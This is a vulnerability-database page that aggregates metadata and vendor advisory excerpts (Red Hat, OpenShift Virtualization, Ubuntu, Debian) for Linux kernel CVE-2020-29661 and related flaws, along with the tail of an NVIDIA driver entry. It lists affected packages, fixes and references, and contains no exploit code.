          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GooglePixel NVIDIA GPUDriver Privilege Escalation Vulnerability (CNVD-2017-00175)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87671"
      },
      {
        "title": "Google Pixel Android NVIDIA GPU Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66796"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95236"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8432"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8432"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95236"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "date": "2017-01-12T20:59:00.607000",
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00175"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8432"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95236"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      },
      {
        "date": "2017-01-18T02:59:14.360000",
        "db": "NVD",
        "id": "CVE-2016-8432"
      },
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NVIDIA GPU Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006804"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-052"
      }
    ],
    "trust": 0.6
  }
}

var-202012-1546
Vulnerability from variot

A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b. Linux Kernel contains a resource locking vulnerability and a freed memory usage vulnerability. Vendors must CID-54ffccbf053b It is published as.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state.

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

Bug fix:

  • RHACM 2.0.8 images (BZ #1915461)

  • Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1915461 - RHACM 2.0.8 images 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation

  1. 8.1) - ppc64le, x86_64

  2. Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2021:0857-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:0857 Issue date: 2021-03-16 CVE Names: CVE-2019-19532 CVE-2020-0427 CVE-2020-7053 CVE-2020-14351 CVE-2020-25211 CVE-2020-25645 CVE-2020-25656 CVE-2020-25705 CVE-2020-28374 CVE-2020-29661 CVE-2021-20265 =====================================================================

  1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64 Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

  • kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c (CVE-2020-25211)

  • kernel: SCSI target (LIO) write to any block on ILO backstore (CVE-2020-28374)

  • kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free (CVE-2020-29661)

  • kernel: malicious USB devices can lead to multiple out-of-bounds write (CVE-2019-19532)

  • kernel: out-of-bounds reads in pinctrl subsystem. (CVE-2020-0427)

  • kernel: use-after-free in i915_ppgtt_close in drivers/gpu/drm/i915/i915_gem_gtt.c (CVE-2020-7053)

  • kernel: performance counters race condition use-after-free (CVE-2020-14351)

  • kernel: Geneve/IPsec traffic may be unencrypted between two Geneve endpoints (CVE-2020-25645)

  • kernel: use-after-free in read in vt_do_kdgkb_ioctl (CVE-2020-25656)

  • kernel: ICMP rate limiting can be used for DNS poisoning attack (CVE-2020-25705)

  • kernel: increase slab leak leads to DoS (CVE-2021-20265)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • kernel-rt: update to the latest RHEL7.9.z4 source tree (BZ#1917909)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1781821 - CVE-2019-19532 kernel: malicious USB devices can lead to multiple out-of-bounds write 1795624 - CVE-2020-7053 kernel: use-after-free in i915_ppgtt_close in drivers/gpu/drm/i915/i915_gem_gtt.c 1862849 - CVE-2020-14351 kernel: performance counters race condition use-after-free 1877571 - CVE-2020-25211 kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c 1883988 - CVE-2020-25645 kernel: Geneve/IPsec traffic may be unencrypted between two Geneve endpoints 1888726 - CVE-2020-25656 kernel: use-after-free in read in vt_do_kdgkb_ioctl 1894579 - CVE-2020-25705 kernel: ICMP rate limiting can be used for DNS poisoning attack 1899804 - CVE-2020-28374 kernel: SCSI target (LIO) write to any block on ILO backstore 1906525 - CVE-2020-29661 kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free 1908827 - CVE-2021-20265 kernel: increase slab leak leads to DoS 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem.

  1. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source: kernel-rt-3.10.0-1160.21.1.rt56.1158.el7.src.rpm

noarch: kernel-rt-doc-3.10.0-1160.21.1.rt56.1158.el7.noarch.rpm

x86_64: kernel-rt-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-kvm-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-kvm-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debuginfo-common-x86_64-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-kvm-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-kvm-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-kvm-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-kvm-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source: kernel-rt-3.10.0-1160.21.1.rt56.1158.el7.src.rpm

noarch: kernel-rt-doc-3.10.0-1160.21.1.rt56.1158.el7.noarch.rpm

x86_64: kernel-rt-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debug-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-debuginfo-common-x86_64-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm kernel-rt-trace-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-19532 https://access.redhat.com/security/cve/CVE-2020-0427 https://access.redhat.com/security/cve/CVE-2020-7053 https://access.redhat.com/security/cve/CVE-2020-14351 https://access.redhat.com/security/cve/CVE-2020-25211 https://access.redhat.com/security/cve/CVE-2020-25645 https://access.redhat.com/security/cve/CVE-2020-25656 https://access.redhat.com/security/cve/CVE-2020-25705 https://access.redhat.com/security/cve/CVE-2020-28374 https://access.redhat.com/security/cve/CVE-2020-29661 https://access.redhat.com/security/cve/CVE-2021-20265 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYFC6bdzjgjWX9erEAQiwXxAAhIAhzEH8blkm3BJaBDqVxbrvZCqhDxwD 6AWik1+tfhHX7z/NoAirvjUw9lcla5CBck5q43HnHbeD9/JR6zuNlH9Lia6gCAmc iEtyzq/BhgTf31xZWc42Dul/yHaMXq0zxwr21oXygrEApL/Lr0wGpvxolZFaQyfj NKyxdnalxAfyok/Ow1smJ+Hj9RHlLc89ZH1ZjpuO+L2xTDH1eZ98U0Q1s91MRBh0 oFuRvfR/+7DpCwMYT0KcY04VtpcB70u4awYVDx7ObkF5+8a3JIJk1ORiEzI/lp21 0No+cTmtndQ3+Yf4l3WlvcOXs6Ac1kJVBkLJI+wA7TKmoPgPCHrOWj95cVu3PEey k5+4VbGRTGeq6ulwDua6wqwT3Jn2VmjNl+3pQDb50DqvPDfBfbH0tuqnmE98Frta WupiGPW0lMZZcBxfscIYe6mgCfYJ7dFkIK6ELCIpysjCTPJN+/y9W7TnDw3tQo/k J1er8l6kJvSeauoUq9q4lijWb1C6ZpXpge7J1VlfKNP4DSZUODb8tNInFHW++aQU A1ujIGH6lJF6hBFbsh9ORW7eK1nkT0m8OCqN6pffWPJ5oeNyYm+7vQ5Cf+TN83Vz XMcW2HIpo6qzThIAxIQ9PE68cfhgtFk1pD06d2OVZNYnmuFvs2SAkpCo2JDZ3nCp Ztp7AlQNK9g= =j5Z8 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce .

This advisory contains the following OpenShift Virtualization 2.6.0 images:

RHEL-8-CNV-2.6 =============kubevirt-cpu-node-labeller-container-v2.6.0-5 kubevirt-cpu-model-nfd-plugin-container-v2.6.0-5 node-maintenance-operator-container-v2.6.0-13 kubevirt-vmware-container-v2.6.0-5 virtio-win-container-v2.6.0-5 kubevirt-kvm-info-nfd-plugin-container-v2.6.0-5 bridge-marker-container-v2.6.0-9 kubevirt-template-validator-container-v2.6.0-9 kubevirt-v2v-conversion-container-v2.6.0-6 kubemacpool-container-v2.6.0-13 kubevirt-ssp-operator-container-v2.6.0-40 hyperconverged-cluster-webhook-container-v2.6.0-73 hyperconverged-cluster-operator-container-v2.6.0-73 ovs-cni-plugin-container-v2.6.0-10 cnv-containernetworking-plugins-container-v2.6.0-10 ovs-cni-marker-container-v2.6.0-10 cluster-network-addons-operator-container-v2.6.0-16 hostpath-provisioner-container-v2.6.0-11 hostpath-provisioner-operator-container-v2.6.0-14 vm-import-virtv2v-container-v2.6.0-21 kubernetes-nmstate-handler-container-v2.6.0-19 vm-import-controller-container-v2.6.0-21 vm-import-operator-container-v2.6.0-21 virt-api-container-v2.6.0-111 virt-controller-container-v2.6.0-111 virt-handler-container-v2.6.0-111 virt-operator-container-v2.6.0-111 virt-launcher-container-v2.6.0-111 cnv-must-gather-container-v2.6.0-54 virt-cdi-importer-container-v2.6.0-24 virt-cdi-cloner-container-v2.6.0-24 virt-cdi-controller-container-v2.6.0-24 virt-cdi-uploadserver-container-v2.6.0-24 virt-cdi-apiserver-container-v2.6.0-24 virt-cdi-uploadproxy-container-v2.6.0-24 virt-cdi-operator-container-v2.6.0-24 hco-bundle-registry-container-v2.6.0-582

Security Fix(es):

  • golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283)

  • golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)

  • gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

  • golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)

  • golang: data race in certain net/http servers including ReverseProxy can lead to DoS (CVE-2020-15586)

  • golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs (CVE-2020-16845)

  • jwt-go: access restriction bypass vulnerability (CVE-2020-26160)

  • golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)

  • golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)

  • containernetworking-cni: Arbitrary path injection via type field in CNI configuration (CVE-2021-20206)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):

1732329 - Virtual Machine is missing documentation of its properties in yaml editor 1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv 1791753 - [RFE] [SSP] Template validator should check validations in template's parent template 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1848954 - KMP missing CA extensions in cabundle of mutatingwebhookconfiguration 1848956 - KMP requires downtime for CA stabilization during certificate rotation 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1853911 - VM with dot in network name fails to start with unclear message 1854098 - NodeNetworkState on workers doesn't have "status" key due to nmstate-handler pod failure to run "nmstatectl show" 1856347 - SR-IOV : Missing network name for sriov during vm setup 1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS 1859235 - Common Templates - after upgrade there are 2 common templates per each os-workload-flavor combination 1860714 - No API information from oc explain 1860992 - CNV upgrade - users are not removed from privileged SecurityContextConstraints 1864577 - [v2v][RHV to CNV non migratable source VM fails to import to Ceph-rbd / File system due to overhead required for Filesystem 1866593 - CDI is not handling vm disk clone 1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs 1868817 - Container-native Virtualization 2.6.0 Images 1873771 - Improve the VMCreationFailed error message caused by VM low memory 1874812 - SR-IOV: Guest Agent expose link-local ipv6 address for sometime and then remove it 1878499 - DV import doesn't recover from scratch space PVC deletion 1879108 - Inconsistent naming of "oc virt" command in help text 1881874 - openshift-cnv namespace is getting stuck if the user tries to delete it while CNV is running 1883232 - Webscale: kubevirt/CNV datavolume importer pod inability to disable sidecar injection if namespace has sidecar injection enabled but VM Template does NOT 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1885153 - [v2v][RHV to CNv VM import] Wrong Network mapping do not show a relevant error message 1885418 - [openshift-cnv] issues with memory overhead calculation when limits are used 1887398 - [openshift-cnv][CNV] nodes need to exist and be labeled first, before the NodeNetworkConfigurationPolicy is applied 1889295 - [v2v][VMware to CNV VM import API] diskMappings: volumeMode Block is not passed on to PVC request. 1891285 - Common templates and kubevirt-config cm - update machine-type 1891440 - [v2v][VMware to CNV VM import API]Source VM with no network interface fail with unclear error 1892227 - [SSP] cluster scoped resources are not being reconciled 1893278 - openshift-virtualization-os-images namespace not seen by user 1893646 - [HCO] Pod placement configuration - dry run is not performed for all the configuration stanza 1894428 - Message for VMI not migratable is not clear enough 1894824 - [v2v][VM import] Pick the smallest template for the imported VM, and not always Medium 1894897 - [v2v][VMIO] VMimport CR is not reported as failed when target VM is deleted during the import 1895414 - Virt-operator is accepting updates to the placement of its workload components even with running VMs 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1898072 - Add Fedora33 to Fedora common templates 1898840 - [v2v] VM import VMWare to CNV Import 63 chars vm name should not fail 1899558 - CNV 2.6 - nmstate fails to set state 1901480 - VM disk io can't worked if namespace have label kubemacpool 1902046 - Not possible to edit CDIConfig (through CDI CR / CDIConfig) 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1903014 - hco-webhook pod in CreateContainerError 1903585 - [v2v] Windows 2012 VM imported from RHV goes into Windows repair mode 1904797 - [VMIO][vmware] A migrated RHEL/Windows VM starts in emergency mode/safe mode when target storage is NFS and target namespace is NOT "default" 1906199 - [CNV-2.5] CNV Tries to Install on Windows Workers 1907151 - kubevirt version is not reported correctly via virtctl 1907352 - VM/VMI link changes to kubevirt.io~v1~VirtualMachineInstance on CNV 2.6 1907691 - [CNV] Configuring NodeNetworkConfigurationPolicy caused "Internal error occurred" for creating datavolume 1907988 - VM loses dynamic IP address of its default interface after migration 1908363 - Applying NodeNetworkConfigurationPolicy for different NIC than default disables br-ex bridge and nodes lose connectivity 1908421 - [v2v] [VM import RHV to CNV] Windows imported VM boot failed: INACCESSIBLE BOOT DEVICE error 1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference 1909458 - [V2V][VMware to CNV VM import via api using VMIO] VM import to Ceph RBD/BLOCK fails on "qemu-img: /data/disk.img" error 1910857 - Provide a mechanism to enable the HotplugVolumes feature gate via HCO 1911118 - Windows VMI LiveMigration / shutdown fails on 'XML error: non unique alias detected: ua-') 1911396 - Set networkInterfaceMultiqueue false in rhel 6 template for e1000e interface 1911662 - el6 guests don't work properly if virtio bus is specified on various devices 1912908 - Allow using "scsi" bus for disks in template validation 1913248 - Creating vlan interface on top of a bond device via NodeNetworkConfigurationPolicy fails 1913320 - Informative message needed with virtctl image-upload, that additional step is needed from the user 1913717 - Users should have read permitions for golden images data volumes 1913756 - Migrating to Ceph-RBD + Block fails when skipping zeroes 1914177 - CNV does not preallocate blank file data volumes 1914608 - Obsolete CPU models (kubevirt-cpu-plugin-configmap) are set on worker nodes 1914947 - HPP golden images - DV shoudld not be created with WaitForFirstConsumer 1917908 - [VMIO] vmimport pod fail to create when using ceph-rbd/block 1917963 - [CNV 2.6] Unable to install CNV disconnected - requires kvm-info-nfd-plugin which is not mirrored 1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration 1920576 - HCO can report ready=true when it failed to create a CR for a component operator 1920610 - e2e-aws-4.7-cnv consistently failing on Hyperconverged Cluster Operator 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923979 - kubernetes-nmstate: nmstate-handler pod crashes when configuring bridge device using ip tool 1927373 - NoExecute taint violates pdb; VMIs are not live migrated 1931376 - VMs disconnected from nmstate-defined bridge after CNV-2.5.4->CNV-2.6.0 upgrade

  1. ========================================================================= Ubuntu Security Notice USN-5130-1 November 09, 2021

linux vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. (CVE-2020-29660)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-3.13.0-188-generic 3.13.0-188.239 linux-image-3.13.0-188-lowlatency 3.13.0-188.239 linux-image-generic 3.13.0.188.197 linux-image-lowlatency 3.13.0.188.197 linux-image-server 3.13.0.188.197 linux-image-virtual 3.13.0.188.197

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

CVE-2020-27815

A flaw was reported in the JFS filesystem code allowing a local
attacker with the ability to set extended attributes to cause a
denial of service.

CVE-2020-27825

Adam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace
ring buffer resizing logic due to a race condition, which could
result in denial of service or information leak.

CVE-2020-27830

Shisong Qin reported a NULL pointer dereference flaw in the Speakup
screen reader core driver.

CVE-2020-28374

David Disseldorp discovered that the LIO SCSI target implementation
performed insufficient checking in certain XCOPY requests. An
attacker with access to a LUN and knowledge of Unit Serial Number
assignments can take advantage of this flaw to read and write to any
LIO backstore, regardless of the SCSI transport settings.

CVE-2020-29568 (XSA-349)

Michael Kurth and Pawel Wieczorkiewicz reported that frontends can
trigger OOM in backends by updating a watched path.

CVE-2020-29569 (XSA-350)

Olivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free
flaw which can be triggered by a block frontend in Linux blkback. A
misbehaving guest can trigger a dom0 crash by continuously
connecting / disconnecting a block frontend. A local attacker can take advantage of
this flaw for memory corruption or privilege escalation.

CVE-2020-36158

A buffer overflow flaw was discovered in the mwifiex WiFi driver
which could result in denial of service or the execution of
arbitrary code via a long SSID value.

CVE-2021-3347

It was discovered that PI futexes have a kernel stack use-after-free
during fault handling. An unprivileged user could use this flaw to
crash the kernel (resulting in denial of service) or for privilege
escalation.

CVE-2021-20177

A flaw was discovered in the Linux implementation of string matching
within a packet. A privileged user (with root or CAP_NET_ADMIN) can
take advantage of this flaw to cause a kernel panic when inserting
iptables rules.

For the stable distribution (buster), these problems have been fixed in version 4.19.171-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAXj9pfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Tf5Q//RdQojeX7VtJ61PsVXRszZh9DJ3PUo64NheFU+QWUYO7F6NUD3fMxiS9K I8Sgfsm28x7RBambjW6TZYseJhQd9aSvaANnPdUj/eZ9P3xBhXFM8wzISosUWgfO 2IIV40oOVj943+BzfIQiq1mgQtwLjh3pNTZAEpjnzD96Tc9tXGyW9/3iGkUHIQjv gUTSvoLIUAI4XfNNUjnok+6kPDyEEIdiwJaGDG+UPZ6HNL/hrG3A4klQc+X7KK5K NCOzl4Wl5pZN7u2Ietn3sFMsNJkMrsfLlVyj8J9PgNwbFQh/+RuvzFcONlQ8iaD9 kx42gkLwjl+hM2UeCpvQndzwqXKPKc6CjFemDj7KWzVA+KkVBRTXCGb9K9CasZOZ 0e/cu+5rjYGubIE3e/jo3Gmhp/fm9fXHESbruxuP+gjdbKcyrGrokNucjRvp6FPP rCX+e7OjsZwWGBIcAw+gDAZkDO7PFEoRtlByF2LmxxNvTufZQZHX8NwVyABCdpZi VQLLeQNXN1pJ4d1NPWgTlKfEmH0sGVQRHCliTkBZmIjvo+y1JClUDBAlWOS4YYQL 4Z4oe1qtOX9z+NkqDqcbgfWw69Q2PipNN3TR5YcBXvOtVhvL+/WFGiooJDqxkdCD j3wO/r/1gut/bK/OJnjmOB9J5OXP+cHxYtrhPqXFy2Hzkgj1CRU= =u23W -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
